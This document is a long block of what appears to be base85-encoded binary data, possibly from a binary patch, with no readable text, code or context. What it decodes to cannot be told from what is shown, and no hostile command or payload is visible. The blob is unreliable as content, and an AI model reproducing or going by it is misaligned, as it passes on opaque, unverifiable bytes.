zH+?bvZQ42`!z_bG+OU>N`)r*pD>z0#80RJzJB^xOlGMADcc$4xcy9iN>iwp~5!1Le zTk&qm?%~nR)%Kymdm-1S#R_r5Uc;^c(Eok@uLb^(wE!Gr#|;Z%ZSNg1dtsS#eh>0y z-fEpg>WOtdeBrExhp3bY0y;7IW6ir}Klt7qIo$0Bh5z~~SJt2UwQ(l~b8g$zvvhz*4SXpDgnZGl!$_7bTNX)7_7O!fWG8t#1f zZA*cRbk0?YR}W^^W8ATTJI za}5CoGjs!@5Z>LGGAwmA?uasAaF?Gh#t$25Y9Pew-#kH3o)2VUn&1gs)N-9KD9F^}4+mV-5E%2#dCg=H0H$oKYI3^RnQB zE{-|Fx 
zFn}iv@BB7dvQwI9Jko&!_Kgc)0on(z?yO7aHRJ5p_SEM_RoePMz=DSN^Yok&C+FUao{9HW!jv{&o1$Oy6_ z!O;O1c19@#pt7^}&!1sn1bXQt6*l|3WFi!BxKK#=;|4G_U+xXu>_lTo zqW)v(KK)cov|#|F6!nqYJi_`4_V6UtI@zZ@$tx~|^;u{)Rd5t(VE^218+_Pw?2Z{% z7LPyxe;P>G6CR&7@U_UUp?TV#HG9J>P+q7tqv@(U{E4$+38XZ6-KV4oFt=qO5;<3S zW3yqNe69hd!{j~~qx}>(kWETa_!??5(fa74+gI_eHX&d> zw1k;7@-d80nzU_;aBVesh_`6-@rA0KV%n}R-R+p}3rW($9oc;r6+ku&SlrndZhyDc zOW=-4tR-tQKdKtp@k_2>wT{0mQqY;rftGp{wj^&2MqtKbuLiX}F4rvGGwDEBe?ilP z=zCPS|7mZ+tS0Y=k7vR)+ea&rR8O=>2xBl~g`GOaaBmsTo9eBIo@QI14J#BF=0cuX ziS@}!OZ`0$*ZXo&>uOqfuns}tyY~qbqW}WA^WqV>$C{_3o;W@|L+ppO?pV7i z3>uuGp4L#pR(McT*-TP$Kn#@ogXcPzq#c@p2rH3n441KnQt9@{n+4_+IZ{22siy47 ztg5Zz59~k8h!i%-FTAEwn3}3Ycv!PxXk^eb6W92^;P5}53t|KbVJ)1yN3!CW5rQAV zP{0(}y7?1fntq4Qu(f9`4-&qOuvG@&8StNdSH;r&uU{smDXkYK(b2fEV5K{nQ}ToO zD}=@qBj>ae6ue*qLmRufo_3F7BV?ff=g8cb8fLIRQFeXvfBN&Ct3yWmddK#J}wBoTRy4QVD8pv=1Y4`kS2&=iH8 z7H~2}EF6KD3&fy;WYQ6Dtd$U*OwQ)q(wFn&8Iuz3CyFXm@HbS{Xm9EfneuQ4zxF9y zgl#y}V6U?9i)VVGy!8BQ3h3;gW>2Bby=%s2@PG=4l`Zr|%ta2YI7df~!gVHB_r+|u zl|AFIb7sVS`jeX+NPy5DKvcfEB(C%v!s#X#hMAx0dz7prbJ7HZ5OH$_e!bUUxRUT4 zE^tfh>spD_b7eOX%!Wh8Ms=&t@b(U_ehErZ8%+hx_hyeSSuAKXs|ReJA7#uQ{&NWR zO%4DcROE&47D+pNreZzYH!fMeIacc-RI63K-0vc)P;4Z`6F+Pr3#HKPTx&}rb>g() z{!&OI;nuGG<*9K&RYtf4N$kVXRT}XDqD}uZL-UpE^kMTwEo>p4SW{NOR;9?4qxO&! 
zKv;peCPec}>NMJ3WNDV3Ad|=z;C8ae|86^X{Pj^Zt@SBnz5`g}`Zsi_gHAE?6?a;u z#HVkbb!pgPMIba0P$qRad>=t{E7j&mw7k_t3O(J=IzNt4Y2_q=|1yFOi%@~pRv!z~d`Owrdy5|lY1EJC9 zXKmm<5Fj3U_&nGbGR)zL@V421;cYj!F?RW9s#x^zuT%j(>KqR@OY9N>ek!Ml_Izey zEN9a;?T#KEt$9VfpwkyG9<7KEL$sYfVugm}wC)q@v|&9hBSGkS&1%WUA8=W^Bqih#8SEt4{@S$3y1D16(f)^m z@n2=K1a;AvYAl`tI{ST*A7MeE!2ksw(-}NLk5#Vli^Zdvs4(J|3;9c3JF%V*%<+_3 z6}6^WrY7wsghLsZu@*-Nv=8{_RXnG{m@=eZyt?OC#4s)&h8DI_mfhYK=BX_lpQ365 zwwxqpPG1V>V)eBv1B5Z`vZi1Zt@59}4}N3tFxyPX*xjF6W8+238w2tQ3Y|k%O?mO0 zB+|phBWFX`_y%IrRN9T6->P>QJJ>=8?=`3UNL3$c@V|Z|wQ+R?48(b~hr^EG*nTV4CFBB6Zw# zY3hjO!=`3igtXmHqV77L3*%%Q6ZTywchwlt%U=Yo)OvF)z-oqnNNn}mbDTMRoncH7 zNW=oeDAX7-()jE1L12o4PeW6`P=l?%%Vz)f@?uFU@zqW&OU$B`wF%x|efko&!UgFE zAE6{j)%m@BR&mTHm}%)Ria2C79~Wh1t5bYSC;pW-T2ARZ0?#rDGe(BdHfaN z;J*I}HT7^@L@6l%t}^|{ZP~i}GYkq^KNsZlQ`OX|!X%MdpAWnaQX3Kr_n#B?pF4hX z!UCh@-p0DI*z`-Skf!~IkYr6 z!$?c>-1ul#wi1H()}KRdf@jd!_TJtmx1Ocp*|+1|&qZ{RixtD2YP25-dQweGA=Md4 zHcabhC2@o{#IQ=`V0s912q=%uQVoCKS`D(x51BJ4T zNs_q^>Z&h#%h}Y&MIm6ZXk^DpG6wi3ke7%kBpBT*sFveCH;O8_tNgpl?*2xVzB48& zb&b0ZgSKim;2Y%ORL7QsujR6)l_t1OFa%ghsrRw**Uu?`({A~q(WuGTEcKkg!jEU} zH@4a}&p`0UXcsQ|5+79oBqAlT_uuZLrK#q}!+*1h0Z3~pF(G~@MKTa6dj`Vy5^#>I zC+*bg_x?_MrUaE_RDGic+Y>Wxva-?F7<_LF6$nt#? 
zl2f~_rh+HZWyP?_ik0I!@;vIwJmTK7#cu_U=PQ*?8H9phv5Y8*xCXa$*oAVc&r6jw* z7-1*1;XkpWK14~}mg_mr%ydhVL6ZJKq_@7@anVOhZPtdLP_}vI2V7S7UVR5UN|JTV zqM++f*R|QZje7ayjt~eh%%bckzr|-ZWL14Bw5Ar;*p+eto7^6Qe`U1-)bWdJRXz?% zYFSskAGc1}|H+ubS+r?uV=u6mQCHCf9CIOTeG+f&27i_(DarecIZPCs9;r8fJY^@~ z5%qO)9|fl^gEluuz2-hQuFk={&-NwV#@WkUt}!5k{I1g?hQxJ#yToRl3Izt2=@9=0 zM81B@s+sc{snvDB&>xJP%&E9;$%0C?)MSSbz$CVkOSPNxMkk(o?0)~1F{PZTNy!}T z-PUR9X|kVAd6jE9j9Lx%v~?VV*>aRGK^u9FKF#f$ z2V3f5*jbynMtV9(8pa0ei-+eA{IgqY1Ms3RRyfe+;EN5LEG$QPHy4{PO~uf|IQv(L zg)}}V9S%1^B$szR9PaI7k!^F&@(4y*B2I%dya&fZ-~qz%BD~v&Vx<%)0`Vy9GsLDI zJ)7*hf&Le`Bw=|-0wNUrije8W**Y(PMXLdm7-v!35%Q=r$l*T1)`#C z?)K;YWeW0g)Q$z^wOu5~`C9`Vq$EM#BS?0>cRQ%q8YQ3QLsR_oCAz;ShjA2qH1bHx zN97ffTkj-kH{7q8D!}f(n#-AJ^4P!e|8smBMeecM%fsE;P0fh6!gnA|3xswsa%Y#g z9@<6|*yggzdH*b`VUt!Jm)@Fhj8@zGPAn^zY z{U;?p>jwLzw)YfJfl>|E-wJ3KK2!x>eC)CRO(T7E|&dX-<4&%pWk*6 ze9Yj0E&J)K_*!7is+HfjOHGdXy#BCrrXYmPlaNZLF=TcmLz4rRo1s+C(58yxX@dZu zXd7Kakf};3Lr*^-e&sdr3(0Hyo76PVuy#D-O|op->Kmb%nPB-UWoI1YJT30`6M-dV zo_3Ag0W_(Ilwe66ux&i8|4K=^{NGnLF~clTOXr;Da>j~PF!Y8H`N4Luo8m zI?&?GoiwvPhAAFFdzj=lXhV3;an2epkVbPdRaEG-1+>eoS^nLl)T!=ce&b~ZE4ngc zBZzi9w(oQ}cv=^-x{({kK;UE#%j;~}cVCKO;S>0aC9xmI{C$09K8u$2>-n8-6&3Wb%>QQ2%VRDvSs6VrZB^KrY^(% zr^9ip;gZ~-Yzbl@8BqmNo}W&z@M&$+i+tpun2iHZv-pUv1w#=AD?I-t3E{pOGp!an z1S57exN&SC@0xh(i>Wkwn_kSh_>I3bGnStqK)=P&-QjK@Uy8)p=e!!^`6kaXXBP)W z6_xW(aepfoW0qAB0IYk5fDJ@wtR91Gia>Z}Djz>i7HdY)>X`v4&1ysCE1>ZK&A8iQ zo7p4a#V#~%WyiO%n)*n5V?Kspq%|yaC|TF@rhMJ4e-pX|$t{c9_M)Wl!N>hmz;(X; zxb^5adJua5Z(T$QO5Sj?iD`#saM`|np#H0crS$2?^8Fu85Hb#fYD}hZ+6;PAV_jEx z6dZ!Hi%oRkWjC48VI!t{7bO=AZfYwn1%r7CfFFRsWHblHXrI#DE)_PDZa7BBx8UgN zgTnJg(4MLoeui)DvXHL};o&kaKe8bW{w-@KIL5p;QmPLI`^8Gifwf4`I6%O1#=*B3 z%KgvaJpYEtnxZ86V-)bU@5K{=f~HJ)VKJ*e{9@(4f)|B7(e}%hYJHE1{yrA^43XSOqQWN(Wh=@^X=2bW_vXJz zZY`lm_v5ikFJ!I!Q7~K`(KmHuX&-rr;Tk3|TjujsD zkD}}X6*hB;$b+%;_ILYCp#L}vTI+$E*r(RoM^ML>9JgP%y!a*Ang5kRIonaha>UxC zZq&=JVDw}Ej{tA+>lF-s{}=kafAiYiE&EDkfK|Jgv1Mp)8M;Xh9gepRXig}&oLz15 
zkr0~MTO%*FKw}y9{I_|T{5MMM%BCq2duF(bCl0#COBt*UvI(?$oIRO6&2%j(_5Vtv z1LYW`&+YKDQEeP(vY6sfahLX%SYc7HurZimax*B%j}RP;&QQ>Y5ZNWeql~O&tDQ8( zuh&-4D^Z`bBrHOB2ca>_%=Il-drogG(0|O@=U4_gBtJ7F<^A z=Qx4-aq;KqxOMWBT z+(JsUe&0o|f=VIrqc*0VX|XN(XnLjWnHCgeq-lB5bB6kX<5V>E3+O_SxLu5r7?*xu z^BeyG_YJXCoA8_5r(4KTSBv7E2T+C$AR_T}UfNd~eD<&IWqsxyZL>^8ZSxoK$M~LB{@;W{cXQIcw%ct5DY#;0~BE`%=xyH>H81g z?8%SlVYE+QE@M@0D&o^o5DZ4M@Re9=9#gdA`r6qWiO5g-cj%)j z7YuL8#Jx+sA81siV9C3Cl;{7?VD$eU9%Y&R?%D`THx45x1;q1i}jc4_w~;>@$vnQx>bvq;sSmRQp?FjltUm`GG(n zBn^!gbRhDKgZ6k^PhFyv!2=!t;#|#oM@zkNYf<9DdH;9hi!JLe+rRQ7j;ET)1sIB^ zDIigP$n+Hr2bmk?KffogMJ2~Z39vCX3B<7_q&48)o|~Vvq0s@JVgAbuG|X7wP1hbO z%2vRXbC{5^cAu5Q`#{#YFvddsm}%R6KR&2r*H2f;*V!d{YMqKG*lokrJnz-Tj1&PMB*@ViN|#@CqS_ z(ZdEEPWF~K&MOs*9^~1ti_0q>bYNn(L6gS~h(pXmazkjwfWbzN_&v!_K}t+QP)PrGFE?` zg%8K{9LltO?<1SECu1jX05$85QRw`T`s{vDy{enzSW!01(WDhCUDoO?`IXk&Pwo70 z$#|}Ff1Xk=dyA}qLpM6a6d9UjQ%YV{kW&_Ppp##r?&PlSS06ux(~yu znFpwja$1gh3&U3_zPye0WuyHjyc2gY2^I??oAk!iCxGo%Jsat8S0l? z$smtWeI2t@gYKxIEA$f<+Cx$^Bw^=PECcCpl-@o+S9qi2n%2L9oMkNaw_-E0<-uQ# z!PNbBqgy&JUzKvauQq`tYjTQHVuub(~v8?AWmLsAK9ZZY_o zFlI5F_MD%mlDhD-EbKI$7Q4umuxEPlHe#td%-Y`c-=OKk05DwDvymp0CTK^NZ_4Jg zbiJ?~pub=Hq|Wdyp_VQO-p*L|^)q}T*-Sj?oqa9oI6QVMPl1=-!L;M%gP8hPdzGwkJYS&< zA_wiaHI}I_U8+&&hhna)9;k3^P#4!}ElE3_d``!}3~rb;ge)cVJkre_QKJAS6N{zb zz`7RrxSLM{ASa92s!PFkjz|(0i>8H93%v!8?@? z!IDCLLa4a|xg0*mFlJaCFOqQS&0W0Jk20n&1g;kYVeT!V#q&=!Pc)5RxZc&Cj2r@kmaa!TZ_&<|tt)gF9>Mt)6 z9kl`SFiJ%%KY2&E0{9;swhKL56Y?6Dee#mdmPk7+5npcyODTB(-=_CS9u!LYW1Gz6 zU*#K#vG6@|sypX(ndK(Maf&8L#c^Zp%;t_vx=z0IftG1u_qLl7D>k1$Nxv>!s``ld zm(7_?GX!kY1<#zC%#aGW8AlFO&WI1x6-B?S>~*FS^^^Kh!=D*Sgi#$>y&>Ee*`=%! 
zoNw9}cG8M`@vO*o#J*WFyGFsU)OWE^>~T5M?~x-dE=0Zn`aJzw!xTqELcbUhqh(cMD4IW7vY>2sZp5DL80P3{35=nJ;&A#%Q+t{kPY^~ z9>MWW=rezY_(J+mI6B{ae9m32QvA`Gr|u&SdkPHQPZyRO4@Pr(&|-72pj|Qw;+n6EURJ?)8{!_*@>JP^a^_9Gihuh$Z=V(h_clrppCzu}cLHYn(HAUgsZg=th z&9ppzh6jncZt&4n+eUNt937f!CklS5mlED90t1eOz-oejt8u~meS!bSGKcYT<3d*$ z-9jmO2dp|)u$NX!(FVVgAShX@135U4+#f^gJC2oyMqxVO5#nC;ABYuN8HPS%vfq&< zgD9d~y}PVTZGOZ@ZG1<5;0sf!)bKE>vLW#EE0WV@xV2|;eB$eDi+UY+3##wahW#Wg zfY;RPm9o)tR}Bq9w9N8wfyDGgWJrn^EtUV7c{Ay9Z~34$puXqhuv|MS`-JaK7;U|n zOf$9o1UKyXXAm&uHlX~Ot-wAfj}z@i4E^|(v~SkO+HkPT#k0i@Ph zJ*6ifyE27Qv&w3j=nB$C?)S6E;i!uk_E!i|QfB~bAl6JOs>hBu_0qa*4VULA10nve zdYE}5>Mp^uHE8&VVrnUBsT!W4WRH#4#mvv^(#>p6GKD`uPy$ymcKlQbg$>yBIiF-> zmv;%o>rfHw9eNIgQ`LNPX6yD4StJGRa-tWDwUUE+W@zC$>lPI9AR<(wLDd>c-pw)< ziccy^g(_+LwPxDp3@rNb0pRwwIBOxF>T9Iz3a1@mAo)$7^Q`pQnA}BuRn%K_3wH$` zg6@E_9$S_N=1IHGUyMx6t_KiViKtt%An;@4nSYK3TL2@2Hs*bdXWHSDR8fKy7_DJc zJsZqrJ5I#I?I@{VH!Kg61MXxH6k4p)@=x#k^m+iE8j>!f)U*fpP;#MHwH2-H9HdAB z>w~VS*;*(v-h=I>bjmY)p|s4OKZh@kTr0)6QsQySQkkq`x_r6s%55(s_dzC8^kXuA zyi%-X43ZgqI@-pJG9{$F_efmI%>aR^)d)&_jguis&#L%v3p1QQ$NL8}>GjKQD3Sn- zV6N=8f8`ep_k%x`4p_%4Rt~otmD3w)S2_|x&Hz$#7M=VjW(BPL3Zy4yJ{Bo@?^{AJ zeuzHhklDtpEGvDO*q_))HTZiNk*|2k_Su@UZnO7G=9P7sv(mNyvYB{! 
zd0o>t$5%i%+J74Q3(0B-6H9oE`ttQqRCv1Gq-<+CImii96yah2XG=D>qK^KD@*B(s zq2bUGz6m>%DtD5p@|czYi#n%$SEI#;I@W{t0>CpYG>i%-+!~pjEsEz~Kcm>=_)Zlo z+;swok^i=I7T){gDf4@8g(YS(y>~sxTe0UnP5eKqw`l#@P@`W<$$>3owH#FH~a1cRHjF*E=@#i0wE7@Y%3X%&1BDo)a~QSoZ1%a zHu~u@QVDvZI82zyYwZ2;r6QNYhY5&duMjO&k^Uw-vYqjDf@V}bbL-ggip9|+y1!DA z3!aFBJ?JJPkPX+ZcO{~3=U@?`>wd{LXkjEqHO2MYBwh?(K6(e7UlB5q@@$ zp)Yavmms!m#^UX~v97Hlq$vwwv)?11T0i_}cdpvBZ^3>RXX(I*e2dSr`+0GWEi3sq zNjG6R9t${Io_}BF;AFGq;o0*d;4zhCIf3u+2gu&D)D7ZlQ)TrT73t)=?qB-ePUQuV zEp@a6HtrwU4@Bf^r>?7k>o$*b{Bc&+KNsEnk?xMoJSoMe4%FSxc)rurH|-wjpH#sV z81($s=200Id{~G{A5$f9T9`NoC+qP^B`aH?Foug-e2e6k@3CBcl2PQGMJd8M23<=5 zQu-ZV2HziyhAle`G$`I@Cf^zxzyAvPWcI0LCNcv#=_(%Kou{QSu33F~nQbTz2_F5@ zv)?f9?_<6`?Qx~Sdo`XR{1tJHk5<$9gU@0!Dw$f%9;gJ>ojQHT^JnQXL;KegkG^qI z3|DbXcqitzC3BDx!v}M(TqtGU8z%?&;sk!>HpXCm*;4EV6vs6>oo%u*7;97@he*>_ z{bmBX^@a2QO}^NkNvR*3zb6?4B8Y%<03=J1P6(b!aVRus?$)9@B5~m@3pLNbHZj_1 z(!KIuRPz~VD2!W5Yoi46w4oEn-G}{$(>mrsde9jS(dB>zmuFyk*u0Ny~o;)S;-B8#KI%}V!3X_j&DvCe21=C0fkTh z?8`kIGpc5Mp&Qbd*g90S^OImQr?jN9c|&<=`YRVF_Wa^`_ov&Um#8u2=DDVJ<_}f^ zBHr`T0jB>=S#qJ}(b?GSvu~S+8E4W~F~O;XvO>i9>wD6D ztF*qsA6z2HE^;;EWre}Kgw6|_PBWWMy_?O_mB)DzBlO~^3d7oD1P)fxLPS2>v>_Ku zpp`!VNy|geZtNbtoe~DVK%g*{T2@66DA0CQX6ESV4twM#U0ih##~ z?c5#uqsy8E*lOi|oT1}nFD|yshV3sdO=JHZ7ZW;@gqPFBO8ajLh96z@wl1D&<$tT@ zN0?9qDXV7r(VKrs4VC4E@3MdT9Pq)UXUC{N<80orHX4CLhaPH^rcN(@L%`Jkws=6i zN4g9Uq(nc$@Gyj~PD9fiNSrCq>+pA8?q;&TjbFTOHmpUUpZuQ$#y8HFZz zJ#OV?Wq=+x6L9QlgCBT;=3nkEm5`n)Y9w#?EZ*li_jmjrHy{p%X*o@_fQD^{VQmtE z7JY9GU5g=$=w!kWGr(_&qUpq!)GpT{bl?u-$Mc>;UoK-r-}OLT2O`q7yuJ~=MmLeM zKZbG}3kR@dH~*)2Lz2JiTfG#qxIUkfmO}?dbk?t8iAJq_4dnA^C(6U z=I@qkoFPZU9GB6PWw=)*;VeIXmL5;fNP8WKIeppuV1&L5RZRSx&x^Em(|euf7=;9$nb z0Gq$#r>fV%O%Bw>#CJ5tUgS%;3dfuXyGJP*e5f3ZC>uYMn3_VuGP}Nein=9;&(5&w z<`$Q|2t=A@o8|Qg>b?ulP@7B5&Z<8jk5@;!;qc?w*qAnYS4-yyU#|5fz9=;lj!sAP z>g*7K&aF#nR&J5}b{9t^^;XMp^Oi zs_>iXb#72!zInj|-l>&<$|MUa8u{c`a!3-D~P zl?bTjFu&P1dTh_}rigpeCUA0})PxOsEBft?^!NJW_Zrc0am$Nt>3i5O9&6nM>i&Rb 
zHra}}mgP%&OM+8X*_ZhuKc_I1t{)jerP;HO9H&W_YV7AEz?)>1N4y(g?BPj_j34 zYn~bOr^5RB`lM;h3~j&~-a)|D71ql7(3nQcTk0x7X`AI{KSd9V@dvA|=uAAy5smGV zany%Dd0Vtw7a3ay6D4b8ZUZvdI=qAGPo;k@Gl3Zs(JNluv(&iJS@A@7`X+cXw!TS8 zNJwC<@XAQ-NHl~@`FAi%y0i~}xJGwP4)&~@O}yFf>J6R*^uzCbjCVep0PDw5zXA@- z=@4`F#+XHK_`HN4J&V{3$H-A(OFkh0a5xpdE`_a}jUGD+RjI$54A6)QAd(NLOJw8) zdRcHLH}v!~GMo`L{x~HaL#}%*y$9T<4p}M&-Kw^1|9YP_qGolg_?Ah`<$Id_*QJ9N zE8bpqiffhcw-UUdhg7Af_f2UBEbxdRB^ULWyhGlPTh+dbT|U7%-n!S;-T@tEo=aR> ze~&;F>09ggfD5DUI|QP^!PImW47}3h{mf-(RUC@=5zOp)JUBRb&}1{e)Z}9YSQt?8 ze0UBj0x_X}X z6aC~9H2ey8rD2AApi-5mWPH2wX$bh(1;*6nF%SjAu!uxPpx)|N=i)sTpll~wJ~(9lLWHcGI-G2_dZde_o< zSl`8+N5QTwSE)$1uP53B(S}tK`MQ2g#xb31rA41ztNBGp%JEr0CS?6tAh?a%!!a9D zy4gX=RoCirXcZcP*jgTjl;axdpJjNi@}E?4=BPZVVp^Au_lPa5)c^q8?ZQUZRi{U# z#}7fDlyem{PNc-k)$hCKc#@Ty{LRhRvtrj;o$2#A>3e1?twu6lX~QgzsGE--(vbJA z8)va=3p2r+6N0|oPpmpII*&f&y&^J^dFPbxdW~X$uKt)%1NF_fs;bD`^zYKV!aX&#cqajxq9z;(jemW&heBN9LvG|-txm%8YO zK{$XOP^JQPq)2d7RabwgBR{}AQR(e8EnkaWGgomH2QcGd<|Ccyt>kz=H`*U9HPs5u zEq8WyJ}D8{ib(CjP{QZ8 z12P79^q<7_Jky#isQ!kGL_{NZ7Y-L21GG>x86M)8Kfvu~S4#r5o{_O#CnOIu( zgiyN_tTJt=BYA=&F%gm9$&{X>{pD8=h@Fki?tXoJy&^X^cY2c-YV$F4ksY)LXaxqr zL#tn2)6M5aE^=N=7J9EWxa~Fj4e-=*f5TUBSdOKmuQ<$S5Cqgz{_I7z;Lk;q_Yln^d#kjl0O_f%;;iF*wrR0-ix zy*q$za3@g*sVpe~K;Hua+yGRuE`yMUX?^C`)m7>e=zSW18J~hYpp!{}XcOlqXI4-E zM%i!p%?&?cKm!^jMzw3LXrDy9G7m5XxyV38FypVTt~3=_|GKhl-Ua$|e(U@7BHR z9;NPj)c_SJpK9K3?b^M|=f<5+-vyK^7%|6d2HiSsulBJ?Zxo-_I~#cPT^qACn-@3D zUEJ~26vm*X#9mlbA-~+TH)^5&WG#AlMeG}V|KfB0LR<=j}njK(!h#q55;kgqe>VF!v=(DeSXj&HzQ zb#)PxuIRqk(jMSfD~%xbr-vr$k1nb0m@_6c*&ou#GVwZ&jjSv!{g>_1UYYp%-a5pt zNhpFdh*#7G<{~CD3s(o~`7aXM*F#d+$ReKiI7<~FNm^HzABfOq{QG?5MnuLC3!oUw zAo)kh1h$8EggS%H9)$qpHRJNdgTL;@70yxg$3i8FPMWn=VPgGh9z)tw8;MyORHzoG@RpaM zUds0ww2u4BPiPVywAav;q#_J*`7w8v)VH2C9T&|=)n>~)GqatlK+R`ygL_EqELF{# zupqeOrS9-I>qAGDw}?$2ihL3j8TP%nx@%x`loUX3`+*-QwqV{^FtGoO^HK;_@y= zfC*jH8V}^Wj<1;l5z2*_)IG)iPOG?nkAL-D0Q0|krRSTe zAm#wA@o_+Ne{o`BLiBa9+zM)0LaDBY`r2&M%aJcaS6&3x#R;o6J+NUvq{7s7inJ|jBs(}b(8YAF0us!M+y*x1kF 
zdb#XPO_+ncl5~Dm*S$T((7u$!7vjtehf_mCG3VtsqLRp$K9{!}&M9zVOnAq#=GF%z z;llB{3$V(wLz3?_owQ~j73`@CXZstRCwa?M=BrtSuR_Ph{*2IeDHR9SoQjbaUg`J3 zM-;6E$e7yO7j8ESLM}d+mzQhORtK=LOCIIkxF7Y2$4@8Mye$G9)>*_Y1F?c{`^sL( z6#3G}Iy0M+u49UJV|3o$HT+4)d6k&txU;?%p#u$xSqox|p7eMX?<)fgLp;G1&!hhE zJ%S+_9U~sEpdf+z+rk0HXvyzXdBY!R_ctA*HE4qV3@4t4PfFY06sR6ZRhGO?iypJ*>`t-$JZ{H1!aGtvSD2Rd$rL zUaiC8hn3c#D;2&bAwb{&Z=+qGyH%!N&DD^jzo0kzO#{>Sv!^|Y0T%kc?%d4{@wqJsw?uOnxChc>810Lm`Ky@g3--Gs1rULS<00QnTKf z$L21nJj_N63azo(_54_|iYzD3`{|IGnRXFNFZPjWZ|=94=D7!p%e#e`#Z|AR`sSm6 z0v=or8YU(qk@fCo#*nt)kIW&?^rE4LlQscqQEd|^&9+n*&+E)Ng|9@u8hEakNcuP! zObv^h_oFiK5`Jq@%F-B{n^P#p(fd7QVEK5QHP{abNJ~F>$jQm6^E3_9pkM$Jz2W<+ z?wj$n<9mqwJru+E@2xvUJeM3%DLQevdLwwF{*>&3D!~fF^D%P{^yQVtIEpdj{EjkU zwwUdUsv+*m`)UX6$x=X_iG#yo<3(MMq{H>FN3-S`!NR}HgRt?i37oFj+FOsw{U!^T zfZG$}Gymzc_nlh6^@-&?&E$8jF;o3)kTb^jQ5DmYn<;dD(I_@mGNK!0%yNMvviVC- z%T(B7&diU&_&M|2(my^cYB7Si+I-)+?&kipJ-f5uF4qmxyeWz;Pg^ zgw&Vg^Zb=8w7z?vdsA7>7`!V1h>nT*Mrel2Nav*Xv4?Klt;xyhX`R(foKL*}?UUzd zxMZj;lH8T$#+OjX_L<<9r$nr$gyC(9k%|SL_Ln4RT#)Y=>Q|KCvf}_h)O5baXLj^n zG`=;aUVx^Df_&=L&-E+d%G1u(T2;2Bts~VuJ>IkN=bW2~+ZGW$tD^3w9G$|Yg+6&w zH6BMxU(m{hD9|cJ-_ISCFf+DGT>#%gnuD%PfZS7a@91G&QR9O5TX1_v_7?xO5sY8# zVhO&C;AJilopLR(_v+2aE0%+st*V9xZ?qr%hH;D6n!+ivY*XCSc`-m;^ziQhTmwSc zlA87EZZ&Pzx{E6uI?_6OmoYdpk3pB8843y%mjs$BXM3JfO0#hCK8iQ%S;}O1;@4Dt zo--xdAu!#F*W3D*j4znJR2#eER1>^BivNkKbS%5>T967j=#H9#1xU95HSSi%?Th85($flQD$a z&ns}cmc5JU+#C4FwcYqraA#=e%ZGtBXfC=yv9=T40z_sO{2GFIb)r-8*%Bn+Urq}>e&&S(LmZ<^;+j3hN>B)fg1)pda8VYL zJ-|qqZMq&%hC2QeT(bA;JqKe;=AQUP8Ev!s#o=O)oGpgI)Gn97*fa)gcrHvcymHo; z@Momph@6#oxj38fAA>_cDff`$`%ltP<)@kE(flD0W|$Hh?5S(_KfghDROWf(FV|Bq zq#$+$$$~JimhFe3{g%1A;-Rfji%Q)d8F3gg`=oB{K}EQdP_y_(Tgu4ZeSz*G<9(+D zXMZu`WR||~VHx<|rM0|yJUwQcOmJ9Ro9tH2Yl+-oT3^%4Pe@3oA<)_46{stMwc%8l z!-s+M1ZqQuN&thL|GF?~HufGLtK>W=#);r{{0z6hoZq=WweTeKzk8$mZ zTZ=xJpI#2|zV;itakmn`tB;6?H~;{~!pL*Hb4#&`(4&K6YM#*2wjUq!qXq48Q~|k< z|7+WnEidY}-bhQW0?t?_=@L1)4%ewUvwAyTYehb}LFa%yucaEwqx_GN5{i%BW=f>I 
zQq?ICO{NvKP;@ylIGEk5usiruZu@TApp)AmRvBz8r_ND9v2s!DWA3=%PCzZp2;$Wwv$SQebAKg*mX%_r{&24*q!iaT zwTBLui}~omw!z_7mbZf6uO>A<@(+?s7B20`F}Trj-Ei>u=s*aaYKdUgS1i4RXlQu3Py>+O3`PE+-apzNOZpJQenJHp62oLg*j4ep9O96xxy~OO*~uO z7I{ic8zUDqC)2q;R@yAK7!rSmh5~=hp?*D_`UP}7Zbn`^6WmZDD&ImGaM|P&s*VG& zjg2RE#euW))|m(RoO+OLT|JlAeBAd0^H_TH;?-lapXf+8i0>h%@m72a~cbRR_(Y`9jEyMiv}spPsQ|@;g;i@+R-C^Ci^X~ zC60%!T3_bL`x2idG8xCVtuM@W)d@c?paaNoeyz%VEYJbzQqO*!xY!~-a zAB#ZY1{29xrdP22`w<@Qg>s*VX3eqtuR8WgCyBoSiLK**GE8?uIWbb;HzTjCZs%st zp-+2~NSx?>0U#?_W0U1;?|a0N%}*bRFUJ$l3j&}oDKzVE5`P#cx36i@6MuI+wYnt{ z5{Eq%K5SZ`@uEIaN#hnX+`u*3Il{bZ=MA_n$j`1Awa%^RA>Yk$Km6M=W|v0yhV9n~ zU9YBcsUDdO)je;8iPO6rc`wa~^zE z06^EET7dZ2{$`TlNhN4}qAZ^0wDpOZahCST&`3*Gay#N#y3=bHPwVYv27wX8eOMZC z7-h@1;U7n1)|Hm{F_?kKrG(+jXD{a*#!(q;ru{B{LWGC4ww9J}j=H}qv;A6@{c$Nj zs&m&d{G{cOx?`g50^e+1I;h_yZ|$A+Ta$0t#z&)w zfTRL~pdc+FAgQD@0wYFucZ?2cP(r0k8a76ch9M!LgdiX}q^15k>LV*<{ZuS%em_vfSOCwcsD4ul?*MdN;$reRd^%-+W%5Ouje8DO7O^sYW6Fvy`9+v z4^(B6dHb$Duvgnz1-m4Q5n(^BuNP364y`Z%E}tnUC&b|>QRFx}7J+2JfP>l)7=o&8 z^|AwP2$+q!x9*=i^yz1VGu^cH{rP6C#%yRQ%wQouKeSub9tVi3SeF#%e|&A9`eNql zo7ihb4&U_~Ph_2*=+}?s32&e9o|;2C(J{WeX4C%gs~v=___&_z=TRV3`JW}Teqd$5 zfwKc+*QPO!*;m?BBnBc&cjH?5O$PAv!j3=T!kRD7=iP6?yRMKgKvNa+mrP);Na?17 zQUtBy#)>f;^2|^?JUlk9+Zp~61yh?o&wa$`TscFR;!Al#2hy$_G}`@idT?q0D)|9< z=1>W$j88*x>iI&~uR<36{sA=z43e8_#9)R>-V8|IF@?94V+eRbq=oJ^RTa!jVo77Z$5-M zN}j*WJ3>>uLU6plpK?=K>>3cQnMrnB|LpIggQ>NWkdCJy5bAsk7_#eiBfYTFY z1ild1?1J4T<&Rpuu~Zg9N($!t&)*-DY?vpK2Gd$H$TZKc!d8--vF-Yg3H1&`ZnZ>R zx>o80iK_?a=VpnCZuZ6+p*!Al7X_sbH|`3A&@-tT2zWhz+tz~iSHjcDw7E3RFj5$r zP!(P_lac#Yrgmu`-&>_~zE{rj9XugAnkdSNXJ*-%3@lCktTq2*tQ(T&$2RCPdL@I2 z`55lTj50pQpbM1xA=yP6efsBA2&gj=#=-mt#2#U)lRM2Y`I}eI*BbL&K(|-evY>sA3ok+|Rf!RIku2Wwq_a_kg)s 